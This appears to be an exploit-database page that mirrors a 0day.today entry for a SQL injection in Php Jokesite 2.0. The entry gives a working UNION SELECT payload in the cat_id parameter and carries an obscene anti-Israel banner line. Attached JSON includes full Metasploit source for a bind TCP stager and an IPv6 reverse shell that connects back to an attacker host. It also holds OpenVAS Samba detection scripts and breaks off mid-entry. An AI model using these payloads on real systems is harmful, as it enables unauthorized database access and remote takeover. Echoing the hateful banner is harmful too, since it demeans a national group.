Search...

Php Jokesite 2.0 (cat_id) Remote SQL Injection Vulnerability

2008-05-20T00:00:00

ID 1337DAY-ID-3056
Type zdt
Reporter 0day Today Team
Modified 2008-05-20T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================
Php Jokesite 2.0 (cat_id) Remote SQL Injection Vulnerability
============================================================



                         ||          ||   | ||        
                  o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
                 ( :   /    (_)    /           (   . 

                   ================================
                      ==========================
                         ==================== 
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ &gt;&gt; Kings of injection                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|


&lt;&lt;!&gt;&gt; Found by  :  Cyb3r-1sT


=======================================================
+++++++++++++ R3membeR Kings of injection +++++++++++++
=======================================================


&lt;&lt;-&gt;&gt; script : jokesite 2.0

&lt;&lt;-&gt;&gt; download : www.scriptdemo.com/php-jokesite/ver2.0  


=======================================================
++++++++++++++++ pwning israel fuckers ++++++++++++++++
=======================================================


&lt;&lt;-&gt;&gt; D0rk    : find it

&lt;&lt;-&gt;&gt; Exploit :&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;
                  www.site.me/jokes_category.php?cat_id=-99999999'+union+select+0,1,2,3,database(),5,6,7,8,9,10,user(),12/*

 
=======================================================
+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
=======================================================


&lt;&lt;-&gt;&gt; My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka  $ nicehacker 
                          anaconda-ksa $ Brightdark $ sirus $ crazy-x  and all freinds




#  0day.today [2018-04-12]  #

JSON Vulners Source

Initial Source

{"published": "2008-05-20T00:00:00", "id": "1337DAY-ID-3056", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T23:46:52", "bulletin": {"published": "2008-05-20T00:00:00", "id": "1337DAY-ID-3056", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 9.0, "modified": "2016-04-19T23:46:52", "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "hash": "d7e13d3c584b1150c3ab1211d74c062566750bcadd82baefa58c12c2bb1f4216", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-19T23:46:52", "edition": 1, "title": "Php Jokesite 2.0 (cat_id) Remote SQL Injection Vulnerability", "href": "http://0day.today/exploit/description/3056", "modified": "2008-05-20T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/3056", "references": [], "reporter": "0day Today Team", "sourceData": "============================================================\r\nPhp Jokesite 2.0 (cat_id) Remote SQL Injection Vulnerability\r\n============================================================\r\n\r\n\r\n\r\n || || | || \r\n o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, \r\n ( : / (_) / ( . \r\n\r\n ================================\r\n ==========================\r\n ==================== \r\n|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|\r\n| _ __ __ __ ______ |\r\n| /' \\ __ /'__`\\ /\\ \\__ /'__`\\ /\\ ___\\ |\r\n| /\\_, \\ ___ /\\_\\/\\_\\L\\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ __\\ \\ \\__/ |\r\n| \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ \\___``\\ |\r\n| \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\L\\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ \\/\\ \\L\\ \\ |\r\n| \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ \\ \\____/ |\r\n| \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ \\/___/ |\r\n| \\ \\____/ >> Kings of injection |\r\n| \\/___/ |\r\n| |\r\n|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|\r\n\r\n\r\n<<!>> Found by : Cyb3r-1sT\r\n\r\n\r\n=======================================================\r\n+++++++++++++ R3membeR Kings of injection +++++++++++++\r\n=======================================================\r\n\r\n\r\n<<->> script : jokesite 2.0\r\n\r\n<<->> download : www.scriptdemo.com/php-jokesite/ver2.0 \r\n\r\n\r\n=======================================================\r\n++++++++++++++++ pwning israel fuckers ++++++++++++++++\r\n=======================================================\r\n\r\n\r\n<<->> D0rk : find it\r\n\r\n<<->> Exploit :>>>>>>>>>\r\n www.site.me/jokes_category.php?cat_id=-99999999'+union+select+0,1,2,3,database(),5,6,7,8,9,10,user(),12/*\r\n\r\n \r\n=======================================================\r\n+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++\r\n=======================================================\r\n\r\n\r\n<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker \r\n anaconda-ksa $ Brightdark $ sirus $ crazy-x and all freinds\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "18ed58c96af9b201cff45d24dddd77d8", "key": "sourceHref"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "4a26ae335de607a4884eea69be4e7652", "key": "title"}, {"hash": "a2323a3f064fcfbfa528e8a384f8d54d", "key": "published"}, {"hash": "a2323a3f064fcfbfa528e8a384f8d54d", "key": "modified"}, {"hash": "5afed1bc1a9b6f1fc8d7ad066d138a98", "key": "sourceData"}, {"hash": "86fafcde2f8b00145efced7b975ee959", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b08ed0580658b24143c57b158c75df9e", "key": "href"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", "hash": "729096f3de12fc9017a25ab7309ecf06f32e249db5b21d00e27410b7b2d63a89", "enchantments": {"score": {"value": 2.1, "vector": "NONE", "modified": "2018-04-12T05:54:56"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310891754", "OPENVAS:1361412562310874976", "OPENVAS:1361412562310874251", "OPENVAS:1361412562310874236", "OPENVAS:1361412562310874235", "OPENVAS:1361412562310843469", "OPENVAS:1361412562310113133", "OPENVAS:1361412562310704135"]}, {"type": "nessus", "idList": ["SL_20180619_SAMBA_ON_SL6_X.NASL", "FEDORA_2018-7D0ACD608B.NASL", "SAMBA_4_7_6.NASL", "FEDORA_2018-C5C651AC44.NASL", "UBUNTU_USN-3595-1.NASL", "DEBIAN_DSA-4135.NASL", "FREEBSD_PKG_FB26F78A26A911E8A1C200505689D4AE.NASL"]}, {"type": "threatpost", "idList": ["THREATPOST:D76F21DEC2B85956DB1AD5200B4FD592"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4135-1:EA2D3"]}, {"type": "ubuntu", "idList": ["USN-3595-1"]}, {"type": "thn", "idList": ["THN:9AF63A5439FB2614532C19DFE04ACC6B"]}, {"type": "freebsd", "idList": ["FB26F78A-26A9-11E8-A1C2-00505689D4AE"]}], "modified": "2018-04-12T05:54:56"}, "vulnersScore": 2.1}, "type": "zdt", "lastseen": "2018-04-12T05:54:56", "edition": 2, "title": "Php Jokesite 2.0 (cat_id) Remote SQL Injection Vulnerability", "href": "https://0day.today/exploit/description/3056", "modified": "2008-05-20T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "https://0day.today/exploit/3056", "references": [], "reporter": "0day Today Team", "sourceData": "============================================================\r\nPhp Jokesite 2.0 (cat_id) Remote SQL Injection Vulnerability\r\n============================================================\r\n\r\n\r\n\r\n || || | || \r\n o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, \r\n ( : / (_) / ( . \r\n\r\n ================================\r\n ==========================\r\n ==================== \r\n|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|\r\n| _ __ __ __ ______ |\r\n| /' \\ __ /'__`\\ /\\ \\__ /'__`\\ /\\ ___\\ |\r\n| /\\_, \\ ___ /\\_\\/\\_\\L\\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ __\\ \\ \\__/ |\r\n| \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ \\___``\\ |\r\n| \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\L\\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ \\/\\ \\L\\ \\ |\r\n| \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ \\ \\____/ |\r\n| \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ \\/___/ |\r\n| \\ \\____/ >> Kings of injection |\r\n| \\/___/ |\r\n| |\r\n|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|\r\n\r\n\r\n<<!>> Found by : Cyb3r-1sT\r\n\r\n\r\n=======================================================\r\n+++++++++++++ R3membeR Kings of injection +++++++++++++\r\n=======================================================\r\n\r\n\r\n<<->> script : jokesite 2.0\r\n\r\n<<->> download : www.scriptdemo.com/php-jokesite/ver2.0 \r\n\r\n\r\n=======================================================\r\n++++++++++++++++ pwning israel fuckers ++++++++++++++++\r\n=======================================================\r\n\r\n\r\n<<->> D0rk : find it\r\n\r\n<<->> Exploit :>>>>>>>>>\r\n www.site.me/jokes_category.php?cat_id=-99999999'+union+select+0,1,2,3,database(),5,6,7,8,9,10,user(),12/*\r\n\r\n \r\n=======================================================\r\n+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++\r\n=======================================================\r\n\r\n\r\n<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker \r\n anaconda-ksa $ Brightdark $ sirus $ crazy-x and all freinds\r\n\r\n\r\n\r\n\n# 0day.today [2018-04-12] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "46b5fc9d114bb8b3b28f4f825a7830eb", "key": "href"}, {"hash": "a2323a3f064fcfbfa528e8a384f8d54d", "key": "modified"}, {"hash": "a2323a3f064fcfbfa528e8a384f8d54d", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "86fafcde2f8b00145efced7b975ee959", "key": "reporter"}, {"hash": "76813e668f4ca13539deae848c70afc9", "key": "sourceData"}, {"hash": "a9a7c7d2213494f30d502a816c641193", "key": "sourceHref"}, {"hash": "4a26ae335de607a4884eea69be4e7652", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"metasploit": [{"lastseen": "2019-11-24T21:31:32", "bulletinFamily": "exploit", "description": "Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker\n", "modified": "2019-06-04T12:13:34", "published": "2019-06-03T22:06:53", "id": "MSF:PAYLOAD/WINDOWS/X64/SHELL/BIND_TCP_RC4", "href": "", "type": "metasploit", "title": "Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/core/payload/windows/x64/bind_tcp_rc4'\n\n\nmodule MetasploitModule\n\n CachedSize = 616\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::BindTcpRc4_x64\n\n def self.handler_type_alias\n \"bind_tcp_rc4\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Bind TCP Stager (RC4 Stage Encryption, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'max3raza', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::BindTcp,\n 'Convention' => 'sockrdi',\n 'Stager' => { 'RequiresMidstager' => false }\n ))\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/x64/bind_tcp_rc4.rb"}, {"lastseen": "2019-11-30T11:35:04", "bulletinFamily": "exploit", "description": "Connect back to attacker and spawn a command shell over IPv6\n", "modified": "2018-07-23T18:38:25", "published": "2018-06-13T19:29:09", "id": "MSF:PAYLOAD/LINUX/X86/SHELL_REVERSE_TCP_IPV6", "href": "", "type": "metasploit", "title": "Linux Command Shell, Reverse TCP Inline (IPv6)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 158\n\n include Msf::Payload::Single\n include Msf::Payload::Linux\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Linux Command Shell, Reverse TCP Inline (IPv6)',\n 'Description' => 'Connect back to attacker and spawn a command shell over IPv6',\n 'Author' => 'Matteo Malvica <matteo[at]malvica.com>',\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Session' => Msf::Sessions::CommandShellUnix\n ))\n end\n\ndef generate_stage\n # tcp port conversion\n port_order = ([1,0]) # byte ordering\n tcp_port = [datastore['LPORT'].to_i].pack('n*').unpack('H*').to_s.scan(/../) # converts user input into integer and unpacked into a string array\n tcp_port.pop # removes the first useless / from the array\n tcp_port.shift # removes the last useless / from the array\n tcp_port = (port_order.map{|x| tcp_port[x]}).join('') # reorder the array and convert it to a string.\n\n # ipv6 address conversion\n # converts user's input into ipv6 hex representation\n words = IPAddr.new(datastore['LHOST'], Socket::AF_INET6).hton.scan(/..../).map {|i| i.unpack('V').first.to_s(16)}\n payload_data =<<-EOS\n xor ebx,ebx\n mul ebx\n push 0x6\n push 0x1\n push 0xa\n mov ecx,esp\n mov al,0x66\n mov bl,0x1\n int 0x80\n mov esi,eax\n\n connect:\n xor ecx,ecx\n xor ebx,ebx\n push ebx\n push ebx\n push 0x#{words[3]}\n push 0x#{words[2]}\n push 0x#{words[1]}\n push 0x#{words[0]}\n push ebx\n push.i16 0x#{tcp_port}\n push.i16 0xa\n mov ecx, esp\n push.i8 0x1c\n push ecx\n push esi\n xor ebx,ebx\n xor eax,eax\n mov al,0x66\n mov bl,0x3\n mov ecx,esp\n int 0x80\n xor ebx,ebx\n cmp eax,ebx\n jne retry\n xor ecx,ecx\n mul ecx\n mov ebx,esi\n mov al,0x3f\n int 0x80\n xor eax,eax\n inc ecx\n mov ebx,esi\n mov al,0x3f\n int 0x80\n xor eax,eax\n inc ecx\n mov ebx,esi\n mov al,0x3f\n int 0x80\n xor edx,edx\n mul edx\n push edx\n push 0x68732f2f\n push 0x6e69622f\n mov ebx,esp\n push edx\n push ebx\n mov ecx,esp\n mov al,0xb\n int 0x80\n ret\n\n retry:\n xor ebx,ebx\n push ebx\n push.i8 0xa\n mul ebx\n mov ebx,esp\n mov al,0xa2\n int 0x80\n jmp connect\n ret\n\n exit:\n xor eax,eax\n mov al,0x1\n int 0x80\n EOS\n\n Metasm::Shellcode.assemble(Metasm::Ia32.new, payload_data).encode_string\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb"}], "openvas": [{"lastseen": "2019-05-29T18:32:25", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-04-10T00:00:00", "published": "2019-04-10T00:00:00", "id": "OPENVAS:1361412562310891754", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891754", "title": "Debian LTS Advisory ([SECURITY] [DLA 1754-1] samba security update)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891754\");\n script_version(\"2019-04-10T02:00:09+0000\");\n script_cve_id(\"CVE-2017-9461\", \"CVE-2018-1050\", \"CVE-2018-1057\", \"CVE-2019-3880\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-04-10 02:00:09 +0000 (Wed, 10 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-10 02:00:09 +0000 (Wed, 10 Apr 2019)\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 1754-1] samba security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/04/msg00013.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-1754-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the DSA-1754-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Various vulnerabilities were discovered in Samba, SMB/CIFS file, print,\nand login server/client for Unix\n\nCVE-2017-9461\n\nsmbd in Samba had a denial of service vulnerability (fd_open_atomic\ninfinite loop with high CPU usage and memory consumption) due to\nwrongly handling dangling symlinks.\n\nCVE-2018-1050\n\nSamba was vulnerable to a denial of service attack when the RPC\nspoolss service was configured to be run as an external daemon.\nMissing input sanitization checks on some of the input parameters to\nspoolss RPC calls could have caused the print spooler service to\ncrash.\n\nCVE-2018-1057\n\nOn a Samba 4 AD DC the LDAP server of Samba incorrectly validated\npermissions to modify passwords over LDAP allowing authenticated\nusers to change any other users' passwords, including administrative\nusers and privileged service accounts (eg Domain Controllers).\n\nThanks to the Ubuntu security team for having backported the rather\ninvasive changeset to Samba in Ubuntu 14.04 (which we could use to\npatch Samba in Debian jessie LTS).\n\nCVE-2019-3880\n\nA flaw was found in the way Samba implemented an RPC endpoint\nemulating the Windows registry service API. An unprivileged attacker\ncould have used this flaw to create a new registry hive file anywhere\nthey had unix permissions which could have lead to creation of a new\nfile in the Samba share.\");\n\n script_tag(name:\"affected\", value:\"'samba' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n2:4.2.14+dfsg-0+deb8u12.\n\nWe recommend that you upgrade your samba packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"ctdb\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libnss-winbind\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libpam-smbpass\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libpam-winbind\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libparse-pidl-perl\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libsmbclient\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libsmbclient-dev\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libwbclient-dev\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libwbclient0\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"python-samba\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"registry-tools\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-common\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-common-bin\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-dbg\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-dev\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-doc\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-dsdb-modules\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-libs\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-testsuite\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-vfs-modules\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"smbclient\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"winbind\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:33:09", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-08-21T00:00:00", "id": "OPENVAS:1361412562310874976", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874976", "title": "Fedora Update for samba FEDORA-2018-bc22d6c7bc", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_bc22d6c7bc_samba_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for samba FEDORA-2018-bc22d6c7bc\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874976\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-08-21 06:55:59 +0200 (Tue, 21 Aug 2018)\");\n script_cve_id(\"CVE-2018-1139\", \"CVE-2018-1140\", \"CVE-2018-10858\", \"CVE-2018-10918\",\n \"CVE-2018-10919\", \"CVE-2018-1050\", \"CVE-2018-1057\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for samba FEDORA-2018-bc22d6c7bc\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"samba on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-bc22d6c7bc\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JLO2ZIZN3LCSYBMKQC6WDL5AJYSE2UG2\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~4.8.4~0.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:02", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-03-21T00:00:00", "id": "OPENVAS:1361412562310874251", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874251", "title": "Fedora Update for samba FEDORA-2018-7d0acd608b", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS 